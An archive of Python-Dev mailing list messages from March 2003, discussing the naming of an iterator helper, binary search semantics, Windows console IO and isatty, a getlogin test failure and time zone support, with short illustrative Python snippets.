> enum_getiter, iter_getiter, listiter_getiter, xreadlines_getiter ...
> So, my first preference is the name in the subject line.

But my original point still stands. dictiter_getiter, enum_getiter,
iter_getiter are all fairly clear: they get the iter for an (existing)
dictiter/enum/iter object. PyObject_GenericGetIter does not return an
iterator for a generic object, it's a generic way to return an iterator
*for an iterator*. PyIter_GenericGetIter, PyObject_IterGetIter, etc are
all more descriptive.

I also agree with Guido that this should not be a public API function
(and if it is, it should be documented <wink>.) Functions that aren't
part of the public API but can't be static should be prefixed with _Py.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From ark@research.att.com  Mon Mar 17 15:17:33 2003
From: ark@research.att.com (Andrew Koenig)
Date: 17 Mar 2003 10:17:33 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEFAEBAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCEEFAEBAB.tim.one@comcast.net>
Message-ID: <yu99znnuxbsi.fsf@europa.research.att.com>

Tim> For example, probing a vanilla binary search tree needs to stop
Tim> when it hits a node with key equal to the thing searched for, or
Tim> move left or right when != obtains.

The binary-search routines in the C++ standard library mostly avoid
having to do != comparisons by defining their interfaces in the
following clever way:

        binary_search   returns a boolean that indicates whether the
                        value sought is in the sequence.  It does not
                        say where that value is.

        lower_bound     returns the first position ahead of which
                        the given value could be inserted without
                        disrupting the ordering of the sequence.

        upper_bound     returns the last position ahead of which
                        the given value could be inserted without
                        disrupting the ordering of the sequence.

        equal_range     returns (lower_bound, upper_bound) as a pair.

In Python terms:

        binary_search([3, 5, 7], 6)  would yield False
        binary_search([3, 5, 7], 7)  would yield True
        lower_bound([1, 3, 5, 7, 9, 11], 9)    would yield 4
        lower_bound([1, 3, 5, 7, 9, 11], 8)    would also yield 4
        upper_bound([1, 3, 5, 7, 9, 11], 9)    would yield 5
        equal_range([1, 1, 3, 3, 3, 5, 5, 5, 7], 3)
                                would yield (2, 5).

If you like, equal_range(seq, x) returns (l, h) such that all the
elements of seq[l:h] are equal to x.  If l == h, the subsequence is
the empty sequence between the two adjacent elements with values that
bracket x.

These definitions turn out to be useful in practice, and are also
easy to implement efficiently using only < comparisons.
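
The four routines described above can be sketched in Python as follows.
This is only an illustration, not the C++ library's code: the function
names mirror the C++ ones, the sequence is assumed to be sorted already,
and the only comparison applied to elements is <.

```python
def lower_bound(seq, x):
    """First position ahead of which x could be inserted, keeping seq sorted."""
    lo, hi = 0, len(seq)
    while lo < hi:
        mid = (lo + hi) // 2
        if seq[mid] < x:
            lo = mid + 1      # seq[mid] sorts before x: answer is to the right
        else:
            hi = mid          # seq[mid] is not before x: answer is mid or left
    return lo


def upper_bound(seq, x):
    """Last position ahead of which x could be inserted, keeping seq sorted."""
    lo, hi = 0, len(seq)
    while lo < hi:
        mid = (lo + hi) // 2
        if x < seq[mid]:
            hi = mid          # x sorts before seq[mid]: answer is mid or left
        else:
            lo = mid + 1      # x is not before seq[mid]: answer is to the right
    return lo


def equal_range(seq, x):
    """(l, h) such that every element of seq[l:h] is equivalent to x."""
    return lower_bound(seq, x), upper_bound(seq, x)


def binary_search(seq, x):
    """True if some element of seq is equivalent to x (neither is < the other)."""
    i = lower_bound(seq, x)
    return i < len(seq) and not (x < seq[i])
```

Note that "equal" here really means "neither element is less than the
other", which is why no == or != test is ever needed.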

-- 
Andrew Koenig, ark@research.att.com, http://www.research.att.com/info/ark


From guido@python.org  Mon Mar 17 15:22:00 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 17 Mar 2003 10:22:00 -0500
Subject: [Python-Dev] PyObject_GenericGetIter()
In-Reply-To: "Your message of Mon, 17 Mar 2003 09:02:02 EST."
 <005801c2ec8d$c8fd9100$125ffea9@oemcomputer>
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net>
 <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net>
 <005801c2ec8d$c8fd9100$125ffea9@oemcomputer>
Message-ID: <200303171522.h2HFM0R18130@pcp02138704pcs.reston01.va.comcast.net>

> > Where was this agreed upon?  
> 
> Perhaps I overstepped.  It's been on my todo list for a 
> couple of months and didn't seem to be even slightly
> controversial.
> 
> 
> > __iter__ returning self doesn't sound very generic to me, 
> > so at the very least the name should be changed IMO.  
> 
> Thomas suggested PyObject_GetSelfIter, PyObject_GenericSelfIter,
> or PyObject_SelfIter.  Consistent with the other tp_slot fillers, I 
> suggest PyObject_GenericIter. 

The "generic" functions aren't just slot fillers, they do a lot of
work that is typical for most types.

The self-iter, OTOH, doesn't do what most types' iterators need -- it
only does what most *iterators* need for their own iterator.  So a
name with 'Self' in it is more appropriate.

I'd pick PyObject_SelfIter.
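
At the Python level, the pattern the C helper factors out looks roughly
like the sketch below.  The Countdown class is hypothetical, and the
method is spelled __next__ as in later Python versions (at the time of
this thread it was next()); the point is only that an iterator's own
__iter__ returns self.

```python
class Countdown:
    """Hypothetical iterator that yields start, start-1, ..., 1."""

    def __init__(self, start):
        self.remaining = start

    def __iter__(self):
        # The "self-iter": an iterator is its own iterator.
        return self

    def __next__(self):
        if self.remaining <= 0:
            raise StopIteration
        value = self.remaining
        self.remaining -= 1
        return value
```

A container type would not use this; its __iter__ has to build and
return a fresh iterator object instead.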

> > Also, adding a standard API for a helper function this
> > trivial doesn't really make sense to me.
> 
> This identical code was duplicated in a dozen different
> modules in the same context.  It comes up when writing
> most iterators and needed to be factored out.

"Need" is a strong word.  It's okay to add this little convenience,
but please give it a proper name.  Maybe some day we'll have a
true generic iterator helper too.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From python@rcn.com  Mon Mar 17 15:28:15 2003
From: python@rcn.com (Raymond Hettinger)
Date: Mon, 17 Mar 2003 10:28:15 -0500
Subject: [Python-Dev] PyObject_GenericGetIter()
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net> <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net> <005801c2ec8d$c8fd9100$125ffea9@oemcomputer> <200303171522.h2HFM0R18130@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <001501c2ec99$d50dd480$125ffea9@oemcomputer>

> The "generic" functions aren't just slot fillers, they do a lot of
> work that is typical for most types.

Learned something new today.


> I'd pick PyObject_SelfIter.

Good.  I'll put it in this evening.


Raymond Hettinger


From tim.one@comcast.net  Mon Mar 17 18:45:17 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 17 Mar 2003 13:45:17 -0500
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEFIFCAA.tim.one@comcast.net>

[David LeBlanc]
> It looks as though IO in Python (2.2.1), regardless of platform or device,
> happens in Objects/fileobject.c and, in particular, writing occurs in
> file_write(...)?

For builtin file objects, at least there, and in file_writelines(), and it's
also possible to use f.fileno() and then use lower-level facilities (like
os.write()).
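
A small sketch of the two routes just mentioned, writing through a file
object and then through its descriptor.  The helper name and the file
contents are made up for illustration; the flush() call is there because
the file object buffers, while os.write() does not.

```python
import os
import tempfile


def write_both_ways(path):
    """Write one line via the file object and one via its raw descriptor."""
    with open(path, "w") as f:
        f.write("via file object\n")
        f.flush()  # empty the file object's buffer before bypassing it
        os.write(f.fileno(), b"via os.write\n")
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    demo_path = os.path.join(tempfile.mkdtemp(), "demo.txt")
    print(write_both_ways(demo_path))
```

Without the flush, the order of the two lines in the file would depend
on when the buffered data happens to be written out.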

> A few questions I hope a lurking (timbot? ;) ) person can answer:
>
> 1. Is the above true, or does something different happen when using a
> Windows console/commandline?

Using one how?  If via a Python file object, yes, the above is true.

> 2. Is there any way to know if a console is being used (that a
> device is the console)?

>>> import sys
>>> sys.stdin.isatty()
True
>>> sys.stdout.isatty()
True
>>> whatever = open('whatever.txt', 'w')
>>> whatever.isatty()
False
>>>

> 3. What's the purpose of the PC/msvcrtmodule.c file?

It implements the Windows-specific msvcrt module:

    http://www.python.org/doc/current/lib/module-msvcrt.html

> Does it play any role in the regular pythonic IO scheme of things?

No, and mixing console-mode IO via that module with standard IO can be a
disaster.

> I'm interested in discovering if the Win32 API for screen reading/writing
> can be used so that character color attributes and cursor commands can be
> manipulated. It would be nice if those could be used transparently to a
> python application so that an application sending (for instance)
> ANSI color codes would succeed and one that didn't wouldn't care. I
> realize this is sort of like curses - is there a Windows version of curses
> that plays well with Python and isn't GPL?

This really belongs on c.l.py, where it gets asked frequently enough.  I
haven't paid attention to the answers.  Fredrik's Console extension for
Windows should tickle your fancy:

    http://effbot.org/zone/console-index.htm


From martin@v.loewis.de  Mon Mar 17 18:47:23 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 17 Mar 2003 19:47:23 +0100
Subject: [Python-Dev] Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net>
References: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net>
Message-ID: <m3isuhesp0.fsf@mira.informatik.hu-berlin.de>

"David LeBlanc" <whisper@oz.net> writes:

> It looks as though IO in Python (2.2.1), regardless of platform or device,
> happens in Objects/fileobject.c and, in particular, writing occurs in
> file_write(...)?
[...]
> 1. Is the above true, or does something different happen when using a
> Windows console/commandline?

If you ask "does writing occur in file_write, even on Windows", then
"yes".  If you ask "does all writing occur in file_write, even on
Windows", then "no". It also occurs in file_writelines, posix_write,
string_print, w_string, and many places that use fprintf (too many
to enumerate them here).

> 2. Is there any way to know if a console is being used (that a device is the
> console)?

posix.isatty comes close.

> 3. What's the purpose of the PC/msvcrtmodule.c file? 

It exposes the following functions

	{"heapmin",		msvcrt_heapmin, METH_VARARGS},
	{"locking",             msvcrt_locking, METH_VARARGS},
	{"setmode",		msvcrt_setmode, METH_VARARGS},
	{"open_osfhandle",	msvcrt_open_osfhandle, METH_VARARGS},
	{"get_osfhandle",	msvcrt_get_osfhandle, METH_VARARGS},
	{"kbhit",		msvcrt_kbhit, METH_VARARGS},
	{"getch",		msvcrt_getch, METH_VARARGS},
	{"getche",		msvcrt_getche, METH_VARARGS},
	{"putch",		msvcrt_putch, METH_VARARGS},
	{"ungetch",		msvcrt_ungetch, METH_VARARGS},

as well as a few symbolic constants.

> Does it play any role in the regular pythonic IO scheme of things?

No. None of these functions is normally called; getpass.py uses
msvcrt.
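
For illustration, two of the functions listed above (kbhit and getch)
could be used like this.  The poll_key helper is hypothetical, the import
is guarded because msvcrt exists only on Windows, and the bytes return
value reflects later Python versions.

```python
try:
    import msvcrt  # available on Windows only
except ImportError:
    msvcrt = None


def poll_key():
    """Return a pending console keypress, or None if there is none.

    Also returns None on platforms without the msvcrt module.
    """
    if msvcrt is None:
        return None
    if msvcrt.kbhit():          # is a keypress waiting in the console buffer?
        return msvcrt.getch()   # read it without echoing
    return None
```

This goes straight to the console, so it is best kept apart from reads
on sys.stdin in the same program.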

Regards,
Martin


From jim@interet.com  Mon Mar 17 19:05:11 2003
From: jim@interet.com (James C. Ahlstrom)
Date: Mon, 17 Mar 2003 14:05:11 -0500
Subject: [Python-Dev] Windows IO
References: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net>
Message-ID: <3E761C67.1030606@interet.com>

David LeBlanc wrote:

 >1. Is the above true, or does something different happen when using a
 >Windows console/commandline?

AFAIK, all Python IO uses the fprintf() functions of Windows.  These
stream IO functions are Posix emulations, are not the native
Windows IO functions, and are second class citizens.  The native
Windows IO functions are CreateFile(), ReadFile(), WriteFile() etc.
The native Windows functions support additional functionality.

 >2. Is there any way to know if a console is being used (that a device 
 >is the console)?

All Windows programs must provide a window to operate.  But
to make porting character-mode programs easier, Windows provides
a "Console Window" feature.  This is a Windows window you can
create which contains the handy features needed to support
character WriteFile() and fprintf().

Usually there is no need to test if a console is in use.  A
Windows program created as a console program has that coded
into its header, and the console is created when it starts.  It
is possible to use CreateProcess() to create a process and its
console window, but again there is no need to test.

 >3. What's the purpose of the PC/msvcrtmodule.c file? Does it play any 
 >role
 >in the regular pythonic IO scheme of things?

This is a handy module, but plays no role in Python IO.

 >I'm interested in discovering if the Win32 API for screen reading/writing
 >can be used so that character color attributes and cursor
 >commands can be manipulated.

A console window supports arrays of cells, and the cell contains
the character and the cell attribute.  That means you can control
color of each cell.  Both character input and mouse input are
supported.  There is a cursor.  The whole thing is a lot like a
terminal (if anyone out there remembers those).

Jim Ahlstrom


From barry@python.org  Mon Mar 17 19:39:43 2003
From: barry@python.org (Barry A. Warsaw)
Date: Mon, 17 Mar 2003 14:39:43 -0500
Subject: [Python-Dev] test_posix failures?
Message-ID: <15990.9343.255137.681030@yyz.zope.com>

test_posix fails for me in current CVS:

ERROR: testNoArgFunctions (__main__.PosixTester)
----------------------------------------------------------------------
Traceback (most recent call last):
  File "Lib/test/test_posix.py", line 46, in testNoArgFunctions
    posix_func()
OSError: [Errno 2] No such file or directory

----------------------------------------------------------------------
Ran 18 tests in 0.038s

narrowed down to posix.getlogin().  FTR I'm on RH7.3.

Here's the fun part <wink>: this succeeds if running in an xterm, but
fails if running in a XEmacs 21.4.11 shell buffer.  I tried it with
Emacs 21.2 as well and it also fails there.  A little C program
calling getlogin() gives the same results.  It also fails in a XEmacs
compilation buffer.

So the os.isatty() test isn't enough.  This returns True in all three
shells but getlogin() still fails.  The weird thing is that I've never
seen failures here before and I do this type of testing all the time.

Does anybody else see this?  Maybe we should just remove getlogin()
from NO_ARG_FUNCTIONS?

-Barry


From thomas@xs4all.net  Mon Mar 17 19:57:53 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 17 Mar 2003 20:57:53 +0100
Subject: [Python-Dev] test_posix failures?
In-Reply-To: <15990.9343.255137.681030@yyz.zope.com>
References: <15990.9343.255137.681030@yyz.zope.com>
Message-ID: <20030317195753.GS2112@xs4all.nl>

On Mon, Mar 17, 2003 at 02:39:43PM -0500, Barry A. Warsaw wrote:

> test_posix fails for me in current CVS:

> narrowed down to posix.getlogin().  FTR I'm on RH7.3.

> Here's the fun part <wink>: this succeeds if running in an xterm, but
> fails if running in a XEmacs 21.4.11 shell buffer.  I tried it with
> Emacs 21.2 as well and it also fails there.  A little C program
> calling getlogin() gives the same results.  It also fails in a XEmacs
> compilation buffer.

> So the os.isatty() test isn't enough.  This returns True in all three
> shells but getlogin() still fails.  The weird thing is that I've never
> seen failures here before and I do this type of testing all the time.

Getlogin isn't guaranteed to work even when running in a terminal. Using the
excellent 'screen' tool, you can 'log out' your session (on a per-shell
basis.) Being 'logged in' just means there is an entry for your terminal in
/var/run/utmp (although the location of the 'utmp' file is
system-dependent.) Observe:

>>> os.getlogin()
'thomas'
^AL
This window is no longer logged in.
>>> os.getlogin()
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
OSError: [Errno 2] No such file or directory
>>> 

In between the two 'getlogin' calls, I hit '^A', 'L', and screen told me
"This window is no longer logged in." And look, ma, no login. Note that
there isn't really a portable way to write utmp (screen jumps through hoops,
and disables the ability if it can't figure out how to do it) and it might
need special privileges, so we can't just add a utmp entry to check against.
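
Code that only wants a user name, and does not care about utmp, might
guard against this along the following lines.  This is a sketch, not
what test_posix does: current_user is a hypothetical helper, and the
getpass.getuser() fallback answers a slightly different question (it
consults environment variables and the password database rather than
the login record).

```python
import getpass
import os


def current_user():
    """Best-effort user name; None if nothing can be determined."""
    try:
        return os.getlogin()      # needs a login record for the terminal
    except (AttributeError, OSError):
        pass                      # no getlogin() here, or no utmp entry
    try:
        return getpass.getuser()  # environment variables, then passwd database
    except (KeyError, OSError, ImportError):
        return None
```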

I'm guessing you updated your (X)Emacs, your libc or something else on your
platform that causes this problem for you, Barry. Perhaps the 'getlogin'
test needs a 'utmp' resource ? :-)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From whisper@oz.net  Mon Mar 17 20:01:38 2003
From: whisper@oz.net (David LeBlanc)
Date: Mon, 17 Mar 2003 12:01:38 -0800
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEFIFCAA.tim.one@comcast.net>
Message-ID: <GCEDKONBLEFPPADDJCOEKEAMIPAA.whisper@oz.net>

> > 2. Is there any way to know if a console is being used (that a
> > device is the console)?
>
> >>> import sys
> >>> sys.stdin.isatty()
> True
> >>> sys.stdout.isatty()
> True
> >>> whatever = open('whatever.txt', 'w')
> >>> whatever.isatty()
> False
> >>>
>

J:\>python
Python 2.2.1 (#34, Jul 16 2002, 16:25:42) [MSC 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> sys.stdout.isatty()
64
>>>

Have we discovered the mystery of life at last? "True" is 64? :)
NOTE: PythonDoc says "isatty" is Unix only.

> This really belongs on c.l.py, where it gets asked frequently enough.

Sorry, I thought a Python "guts" question would be ok here and likely to get
better informed answers than over on the (more or less) application side of
the house.

> I haven't paid attention to the answers.  Fredrik's Console extension for
> Windows should tickle your fancy:

I'll take a look at it. Meanwhile, someone has kindly sent me source for a
PDCurses binding for Python.

Thanks to everyone for their answers! I'd like to thank the Academy, the
Screen Actor's Guild and especially, Timbot, who helped make it all possible
:) ;)

Regards,

Dave LeBlanc
Seattle, WA USA


From barry@python.org  Mon Mar 17 20:06:32 2003
From: barry@python.org (Barry A. Warsaw)
Date: Mon, 17 Mar 2003 15:06:32 -0500
Subject: [Python-Dev] test_posix failures?
References: <15990.9343.255137.681030@yyz.zope.com>
 <20030317195753.GS2112@xs4all.nl>
Message-ID: <15990.10952.901572.773533@gargle.gargle.HOWL>

>>>>> "TW" == Thomas Wouters <thomas@xs4all.net> writes:

    TW> I'm guessing you updated your (X)Emacs, your libc or something
    TW> else on your platform that causes this problem for you,
    TW> Barry.

Who knows? :)
    
    TW> Perhaps the 'getlogin' test needs a 'utmp' resource ? 
    TW> :-)

Maybe we should just ditch the test.  It's only there to make sure
that getlogin() takes no arguments.

-Barry


From neal@metaslash.com  Mon Mar 17 20:29:47 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Mon, 17 Mar 2003 15:29:47 -0500
Subject: [Python-Dev] test_posix failures?
In-Reply-To: <15990.10952.901572.773533@gargle.gargle.HOWL>
References: <15990.9343.255137.681030@yyz.zope.com>
 <20030317195753.GS2112@xs4all.nl>
 <15990.10952.901572.773533@gargle.gargle.HOWL>
Message-ID: <20030317202947.GD14067@epoch.metaslash.com>

On Mon, Mar 17, 2003 at 03:06:32PM -0500, Barry A. Warsaw wrote:
> 
> >>>>> "TW" == Thomas Wouters <thomas@xs4all.net> writes:
> 
>     TW> I'm guessing you updated your (X)Emacs, your libc or something
>     TW> else on your platform that causes this problem for you,
>     TW> Barry.
> 
> Who knows? :)
>     
>     TW> Perhaps the 'getlogin' test needs a 'utmp' resource ? 
>     TW> :-)
> 
> Maybe we should just ditch the test.  It's only there to make sure
> that getlogin() takes no arguments.

I think the test should be removed. I'm the one who added it, but
there have been too many problems with it to make it useful.
I will remove it later, unless someone beats me to it.

Neal


From tim.one@comcast.net  Mon Mar 17 20:38:40 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 17 Mar 2003 15:38:40 -0500
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEKEAMIPAA.whisper@oz.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEGHFCAA.tim.one@comcast.net>

[David LeBlanc]
> Have we discovered the mystery of life at last? "True" is 64? :)
> NOTE: PythonDoc says "isatty" is Unix only.

I don't know what PythonDoc means.  The docs for the file-object method
isatty (which my examples used) do not say it's Unix only:

    http://www.python.org/doc/current/lib/bltin-file-objects.html

If some other piece of doc contradicts that, please tell

    mailto:python-docs@python.org

or open an SF bug report?


From tim.one@comcast.net  Mon Mar 17 21:26:08 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 17 Mar 2003 16:26:08 -0500
Subject: [Python-Dev] tzset
In-Reply-To: <3E75B2A8.3030102@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEGMFCAA.tim.one@comcast.net>

[Stuart Bishop]
>> Yup. It sucks, but is the best there is. I can't even find proprietary
>> solutions for various Unix flavours. Maybe a post to Slashdot saying
>> Zope 3 will be Windows only due to limitations in POSIX would at least
>> get something for the free distros :-)

[M.-A. Lemburg]
> I wonder why we need a TZ-parser then ? If it's non-standard
> anyway, the module is probably better off outside the core as
> separate download from e.g. SF.

TZ parsing code hasn't been added to Python, just a wrapper around the
platform tzset() function (if any, and for now ignoring the flavor of tzset
supplied by Windows).  POSIX defines various forms TZ values can take.  Some
forms have portable meaning across POSIX systems, while others do not.


>>> I hope the community takes up the challenge of building a sane
>>> cross-platform time zone facility building on 2.3 datetime's tzinfo
>>> objects.

>> A cross-platform time zone facility isn't a problem - the data
>> we need is available and maintained as part of numerous free Unix
>> distributions. We could even steal C code to decode it if we are
>> particularly lazy.

> -1
>
> Why bloat the Python distribution with yet another locale
> implementation ?

Well, I didn't say anything about the std distribution.  Whether there or
elsewhere, Python didn't and doesn't have any portable (x-platform) way to
deal with time zones.  2.3's tzinfo objects are capable of carrying time
zone information in a sane x-platform way, but no concrete tzinfo objects
are supplied.
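
To make "concrete tzinfo object" tangible, here is about the smallest
one that can be written by hand.  The FixedOffset class is illustrative
only: it models a constant offset from UTC with no daylight-saving
rules, which is far short of a real time zone database.

```python
from datetime import datetime, timedelta, tzinfo


class FixedOffset(tzinfo):
    """A time zone with a constant UTC offset and no DST."""

    def __init__(self, minutes_east, name):
        self._offset = timedelta(minutes=minutes_east)
        self._name = name

    def utcoffset(self, dt):
        return self._offset

    def dst(self, dt):
        return timedelta(0)   # never in daylight-saving time

    def tzname(self, dt):
        return self._name


eastern = FixedOffset(-5 * 60, "EST")
utc = FixedOffset(0, "UTC")
sent = datetime(2003, 3, 17, 16, 26, 8, tzinfo=eastern)
print(sent.astimezone(utc))
```

Anything with real DST transitions needs rules or data behind dst() and
utcoffset(), which is exactly the part that is not supplied.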


From whisper@oz.net  Mon Mar 17 21:53:55 2003
From: whisper@oz.net (David LeBlanc)
Date: Mon, 17 Mar 2003 13:53:55 -0800
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEGHFCAA.tim.one@comcast.net>
Message-ID: <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>

> -----Original Message-----
> From: python-dev-admin@python.org [mailto:python-dev-admin@python.org]On
> Behalf Of Tim Peters
> Sent: Monday, March 17, 2003 12:39
> To: David LeBlanc
> Cc: Python-Dev@Python. Org
> Subject: RE: [Python-Dev] RE: Windows IO
>
>
> [David LeBlanc]
> > Have we discovered the mystery of life at last? "True" is 64? :)
> > NOTE: PythonDoc says "isatty" is Unix only.
>
> I don't know what PythonDoc means.  The docs for the file-object method
> isatty (which my examples used) do not say it's Unix only:
>
>     http://www.python.org/doc/current/lib/bltin-file-objects.html
>
> If some other piece of doc contradicts that, please tell
>
>     mailto:python-docs@python.org
>
> or open an SF bug report?
>

I don't have the capability to open an SF bug report.

"isatty" is not documented at all under the Global Modules "sys" entry for
Python 2.2.1 documentation (sorry, I thought "PythonDoc" was a recognized
name). The following doesn't work:
J:\>python
Python 2.2.1 (#34, Jul 16 2002, 16:25:42) [MSC 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> stdout.isatty()
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
NameError: name 'stdout' is not defined
>>> isatty(stdout)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
NameError: name 'isatty' is not defined
>>> isatty(__stdout__)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
NameError: name 'isatty' is not defined
>>> import os
>>> os.stdout.isatty()
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
AttributeError: 'module' object has no attribute 'stdout'
>>>

Is isatty a built-in, a function of os only available on Unix, or a function
of sys available on all platforms? It appears to be a function in the sys
module and so the doc for it should go there?

Under the "os" entry it's:
"isatty(fd)
Return 1 if the file descriptor fd is open and connected to a tty(-like)
device, else 0. Availability: Unix. "

I don't see how to create a file() that is connected to stdout without
importing sys...? Is there a way? If there is not, then file.isatty() is
moot.

So, really, what is the meaning of "64" as the return from
sys.stdout.isatty()?

Dave LeBlanc
Seattle, WA USA


From fdrake@acm.org  Mon Mar 17 22:06:49 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Mon, 17 Mar 2003 17:06:49 -0500
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>
References: <BIEJKCLHCIOIHAGOKOLHOEGHFCAA.tim.one@comcast.net>
 <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>
Message-ID: <15990.18169.95695.749468@grendel.zope.com>

David LeBlanc writes:
 > "isatty" is not documented at all under the Global Modules "sys" entry for
 > Python 2.2.1 documentation (sorry, I thought "PythonDoc" was a recognized
 > name). The following doesn't work:
...
 > Is isatty a built-in, a function of os only available on Unix, or a function
 > of sys available on all platforms? It appears to be a function in the sys
 > module and so the doc for it should go there?

isatty() is a method of a file object.  It's documented as part of the
file object; see section 2.2.8 of the library reference manual.

 > Under the "os" entry it's:
 > "isatty(fd)
 > Return 1 if the file descriptor fd is open and connected to a tty(-like)
 > device, else 0. Availability: Unix. "
 > 
 > I don't see how to create a file() that is connected to stdout without
 > importing sys...? Is there a way? If there is not, then file.isatty() is
 > moot.

Standard output is the file object sys.stdout.

 > So, really, what is the meaning of "64" as the return from
 > sys.stdout.isatty()?

It's a true value.  That's all.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From martin@v.loewis.de  Mon Mar 17 22:08:31 2003
From: martin@v.loewis.de ("Martin v. Löwis")
Date: Mon, 17 Mar 2003 23:08:31 +0100
Subject: [Python-Dev] Windows IO
In-Reply-To: <3E761C67.1030606@interet.com>
References: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net> <3E761C67.1030606@interet.com>
Message-ID: <3E76475F.9080508@v.loewis.de>

James C. Ahlstrom wrote:
> AFAIK, all Python IO uses the fprintf() functions of Windows.  These
> stream IO functions are Posix emulations, are not the native
> Windows IO functions, and are second class citizens.  The native
> Windows IO functions are CreateFile(), ReadFile(), WriteFile() etc.
> The native Windows functions support additional functionality.

This isn't really the case. fprintf is not (primarily) defined in
POSIX, but in standard C, and it is part of the standard C library
that comes with the C compiler. It is true that fprintf is not a system
call on Windows, but neither is it a system call on Unix (the system
call on Unix is write(2)).

Regards,
Martin


From martin@v.loewis.de  Mon Mar 17 22:12:07 2003
From: martin@v.loewis.de ("Martin v. Löwis")
Date: Mon, 17 Mar 2003 23:12:07 +0100
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>
References: <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>
Message-ID: <3E764837.4090400@v.loewis.de>

David LeBlanc wrote:
> Is isatty a built-in, a function of os only available on Unix, or a function
> of sys available on all platforms? It appears to be a function in the sys
> module and so the doc for it should go there?

*This* question definitely is off-topic for python-dev. Python-dev 
readers are supposed to study the Python source code to answer such a 
question.

> So, really, what is the meaning of "64" as the return from
> sys.stdout.isatty()?

Use the source, Luke.

Regards,
Martin


From tim.one@comcast.net  Mon Mar 17 22:09:54 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 17 Mar 2003 17:09:54 -0500
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEHDFCAA.tim.one@comcast.net>

[David LeBlanc]
> I don't have the capability to open an SF bug report.

It's not restricted -- anyone can open a bug report.  You need a web browser
and an internet connection, of course.

> "isatty" is not documented at all under the Global Modules "sys" entry for
> Python 2.2.1 documentation

No, but why would it be?  I gave you a link to the current docs before:

    http://www.python.org/doc/current/lib/bltin-file-objects.html

Go there and search down for isatty.  In 2.2.1, the link is this instead:

    http://www.python.org/doc/2.2.1/lib/bltin-file-objects.html

> (sorry, I thought "PythonDoc" was a recognized
> name). The following doesn't work:
> J:\>python
> Python 2.2.1 (#34, Jul 16 2002, 16:25:42) [MSC 32 bit (Intel)] on win32
> Type "help", "copyright", "credits" or "license" for more information.
> >>> stdout.isatty()
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
> NameError: name 'stdout' is not defined

I showed concrete examples in the last msg.  stdout lives in sys, as was
shown there:

>>> import sys
>>> sys.stdout.isatty()
True
>>>

That's in 2.3.  I don't have 2.2.1.  Here's under 2.0:

>>> import sys
>>> sys.stdout.isatty()
64
>>>

> >>> isatty(stdout)
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
> NameError: name 'isatty' is not defined
> >>> isatty(__stdout__)
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
> NameError: name 'isatty' is not defined
> >>> import os
> >>> os.stdout.isatty()
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
> AttributeError: 'module' object has no attribute 'stdout'
> >>>

Please read the docs -- there's no reason to expect any of those to work.

> Is isatty a built-in,

No.

> a function of os only available on Unix,

No, although os.isatty exists on some platforms.  fileobject.isatty() exists
on all platforms.

> or a function of sys available on all platforms?

It's not in sys on any platform.

> It appears to be a function in the sys module and so the doc for it should
> go there?

Nope, isatty() is never in sys.  It's primarily a *method* on file objects,
as all the examples I've given have used.  sys.stdin and sys.stdout are file
objects.

> Under the "os" entry it's:
> "isatty(fd)
